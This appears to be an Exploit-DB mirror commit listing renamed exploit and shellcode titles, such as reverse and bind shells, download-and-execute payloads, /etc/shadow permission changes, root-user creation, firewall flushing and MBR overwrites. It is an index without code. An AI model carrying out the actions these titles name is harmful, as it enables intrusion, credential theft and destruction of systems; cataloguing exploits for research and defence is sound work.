exploit-db-mirror/platforms/windows/dos/37593.py
Offensive Security c7b4bfd8e6 DB: 2017-08-23
23 new exploits

Microsoft Windows 7 SP1 x86 -  GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)
Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow
Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow
VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow
Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)

IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)

BSD - Passive Connection Shellcode (124 bytes)
BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)
BSD/x86 - setuid(0) then execve /bin/sh Shellcode (30 bytes)
BSD/x86 - Bind Shell  31337/TCP + setuid(0) Shellcode (94 bytes)
BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)
BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)
BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes)
BSD/x86 - Bind Random Port Shellcode (143 bytes)
BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)
BSD/x86 - execve /bin/sh Shellcode (27 bytes)
BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)
BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes)
BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)
BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)
BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes)
BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)
BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)
BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)
BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)
FreeBSD i386 & AMD64 - Execve /bin/sh Shellcode (Anti-Debugging) (140 bytes)
BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)
FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)
FreeBSD/x86 - connect back.send.exit /etc/passwd Shellcode (112 bytes)
FreeBSD/x86 - kill all processes Shellcode (12 bytes)
FreeBSD/x86 - rev connect + recv + jmp + return results Shellcode (90 bytes)
FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)
FreeBSD/x86 - Reverse /bin/sh Shell (127.0.0.1:8000) Shellcode (89 bytes)
FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)
FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)
FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)
FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)
FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes)
FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)
FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)
FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)

FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)
FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)

FreeBSD/x86 - kldload /tmp/o.o Shellcode (74 bytes)
FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)

FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes)
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)
Linux/x86 - Bind Shellcode (Generator)
Windows XP SP1 - Bind Shellcode (Generator)
(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode
Linux/x86 - cmd Null-Free Shellcode (Generator)
(Generator) - Alphanumeric Shellcode (Encoder/Decoder)
Linux/x86 - Bind TCP Shellcode (Generator)
Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)
Linux/x86 - Command Null-Free Shellcode (Generator)
Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)
Win32 - Multi-Format Encoding Tool Shellcode (Generator)
iOS - Version-independent Shellcode
Cisco IOS - Connectback 21/TCP Shellcode
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
iOS Version-independent - Null-Free Shellcode
Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode
Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Semi-Stealth Shell  Shellcode (88+ bytes)  (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)

Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)
Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)

Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)
Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)
Linux/x86 - killall5 polymorphic Shellcode (61 bytes)
Linux/x86 - /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Bind 4444/TCP Shellcode (XOR Encoded) (152 bytes)
Linux/x86 - reboot() polymorphic Shellcode (57 bytes)
Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)
Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)
Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)
Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)
Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)
Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)
Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)

Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)
Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)

Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)
Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)

Linux/x86 - Shellcode Obfuscator (Generator)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Shellcode (28 bytes)
Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)

Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)

Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)
Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)

Linux/x86 - /sbin/iptables -F Shellcode (40 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (40 bytes)

Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)
Linux/x86 - HTTP/1.x GET_ Downloads + execve() Shellcode (111+ bytes)
Linux/x86 - executes command after setreuid Shellcode (49+ bytes)
Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + executes command (49+ bytes)
Linux/x86 - Bind 31337/TCP + setuid Shellcode (96 bytes)
Linux/x86 - Bind 2707/TCP Shellcode (84 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - Bind 31337/TCP SET_PORT() Shellcode (100 bytes)
Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes)  (Generator)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)

Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes)
Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)

Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)
Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes)
Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind 64713/TCP Shellcode (86 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)

Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)

Linux/x86 - TCP Proxy Shellcode (236 bytes)
Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes)
Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)
Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)
Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)
Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)
Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)

Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)

Linux/x86 - Reverse  TCP Shell Shellcode (90 bytes)  (Generator)
Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)
Linux/x86 - read(0_buf_2541); chmod(buf_4755); Shellcode (23 bytes)
Linux/x86 - write(0__Hello core!\n__12); (with optional 7 byte exit) Shellcode (36 bytes)
Linux/x86 - snoop /dev/dsp Shellcode (172 bytes)
Linux/x86 - /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)
Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)
Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - chroot + standart Shellcode (66 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)
Linux/x86 - setreuid/execve Shellcode (31 bytes)
Linux/x86 - Alphanumeric Shellcode (64 bytes)
Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)
Linux/x86 - setreuid + execve Shellcode (31 bytes)
Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)
Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)
Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - iptables -F Shellcode (45 bytes)
Linux/x86 - iptables -F Shellcode (58 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (45 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (58 bytes)

Linux/x86 - connect Shellcode (120 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)

Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy Shellcode (126 bytes)
Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)
Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)
Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)
Linux/x86 - Add User (t00r) Shellcode (82 bytes)
Linux/x86 - Add User Shellcode (104 bytes)
Linux/x86 - break chroot Shellcode (34 bytes)
Linux/x86 - break chroot Shellcode (46 bytes)
Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)
Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)
Linux/x86 - Add Root User Shellcode (104 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)
Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)

Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)
Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)

Linux/x86 - chroot()/execve() code Shellcode (80 bytes)
Linux/x86 - Add User (z) Shellcode (70 bytes)
Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)
Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)
Linux/x86 - Add Root User (z) Shellcode (70 bytes)
Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)
Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)
OSX PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)
Linux/x86 & Unix/SPARC & IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)
Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)
Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)
Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)
OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)
Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)
Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)
BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)
NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
OpenBSD/x86 - Bind 6969/TCP Shellcode (148 bytes)
OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)
OSX/PPC - sync()_ reboot() Shellcode (32 bytes)
OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)
OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)
OSX/PPC - sync() + reboot() Shellcode (32 bytes)

OSX/PPC - Add user _r00t_ Shellcode (219 bytes)
OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)
Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)
Solaris/SPARC -  Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator)
Solaris/SPARC - setreuid/execve Shellcode (56 bytes)
Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)
Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)
Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)
Solaris/SPARC - setreuid + execve Shellcode (56 bytes)
Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)
Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind Shellcode (240 bytes)
Solaris/x86 - Bind TCP Shellcode (Generator)
Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)
Solaris/x86 - Bind TCP Shellcode (Generator)
Windows 5.0 < 7.0 x86 - Bind Shell 28876/TCP Null-Free Shellcode
Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)
Win32 - SEH Omelet Shellcode
Win32 - Bind 23/TCP Winexec Telnet Shellcode (111 bytes)
Win32 - PEB!NtGlobalFlags Shellcode (14 bytes)
Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes)
Win32/XP SP2 - cmd.exe Shellcode (57 bytes)
Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)
Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Win32 - ConnectBack + Download A File + Save + Execute Shellcode
Win32 - Download File + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)
Win32 - Download File + Execute Shellcode (192 bytes)
Win32 - Download File + Execute Shellcode (124 bytes)
Win32/NT/XP - IsDebuggerPresent Shellcode (39 bytes)
Win32 SP1/SP2 - Beep Shellcode (35 bytes)
Win32/XP SP2 - Pop up message box Shellcode (110 bytes)
Win32 - WinExec() Command Parameter Shellcode (104+ bytes)
Win32 - Download File + Execute Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - SEH Omelet Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - Sellcode cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - Pop up message box Shellcode (110 bytes)
Windows x86 - WinExec() Command Parameter Shellcode (104+ bytes)
Windows x86 - Download File + Execute Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)

Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes)  (Generator)
Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator)
Windows XP - Download File + Execute Shellcode
Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)
Windows XP - Download File + Execute Null-Free Shellcode
Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)

Win64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)
Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)
Linux/x86 - setuid(0) + cat /etc/shadow Shellcode (49 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (33 bytes)
Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)
Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Win32 XP SP3 - ShellExecuteA Shellcode
Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Win32 XP SP3 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode
FreeBSD/x86 - Bind 1337/TCP Shellcode (167 bytes)
Win32/XP SP2 - calc.exe Shellcode (45 bytes)
Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode
FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)
Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)

Win32/XP SP2 (EN + AR) - cmd.exe Shellcode (23 bytes)
Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)

Linux/x86 - break chroot Shellcode (79 bytes)
Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot _..._) + execve /bin/sh Shellcode (79 bytes)

Linux/x86 - Append '/etc/passwd' + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)

Win32 XP SP2 (FR) - calc Shellcode (19 bytes)
Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Linux/x86 - bin/cat /etc/passwd Shellcode (43 bytes)
Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes)
Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes)
Linux/x86 - /bin/sh Shellcode (8 bytes)
Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (8 bytes)
Linux/x86 - disabled modsecurity Shellcode (64 bytes)
Win32 - JITed Stage-0 Shellcode
Win32 - JITed exec notepad Shellcode
Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes)
Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes)
Linux/x86 - Disabled modsecurity Shellcode (64 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)
Win32 - MessageBox Shellcode (Metasploit)
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Linux/x86 - Bind nc -lvve/bin/sh -p13377 Shellcode
Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)
Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)
Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (33 bytes)
Linux/x86 - chmod(_/etc/shadow__ 0777) Shellcode (29 bytes)
Linux - write() + exit(0) Shellcode (Genearator With Customizable Text)
Linux/x86 - chmod  0777 /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)
Linux - write() + exit(0) Shellcode (Generator)

Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)
Linux/x86 - Sends _Phuck3d!_ To All Terminals Shellcode (60 bytes)

Windows XP SP2 (FR) - Download File + Execute Shellcode
Windows XP SP2 (French) - Download File + Execute Shellcode

Linux/x86 - Disable randomize stack addresse Shellcode (106 bytes)
Linux/x86 -  Disable ASLR Security Shellcode Shellcode (106 bytes)
Linux/x86 - setuid(0) + chmod(_/etc/shadow__ 0666) Polymorphic Shellcode (61 bytes)
Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)

Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)

Linux/x86 - Reverse  Netcat Shell (8080/TCP) Shellcode (76 bytes)
Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)

Solaris/x86 - Sync() & reboot() + exit(0) Shellcode (48 bytes)
Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)
Linux/x86 - Bind 31337/TCP + setreuid (0_0) Polymorphic Shellcode (131 bytes)
Linux/x86-64 - setuid(0) + chmod (_/etc/passwd__ 0777) & exit(0) Shellcode (63 bytes)
Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)

Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)

Windows - WinExec cmd.exe + ExitProcess Shellcode (195 bytes)
Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)
Linux/x86 - /bin/sh Polymorphic Shellcode (116 bytes)
Linux/ARM - chmod(_/etc/shadow__ 0777) polymorphic Shellcode (84 bytes)
Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)
Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)
Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)
Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)
Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 - 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode
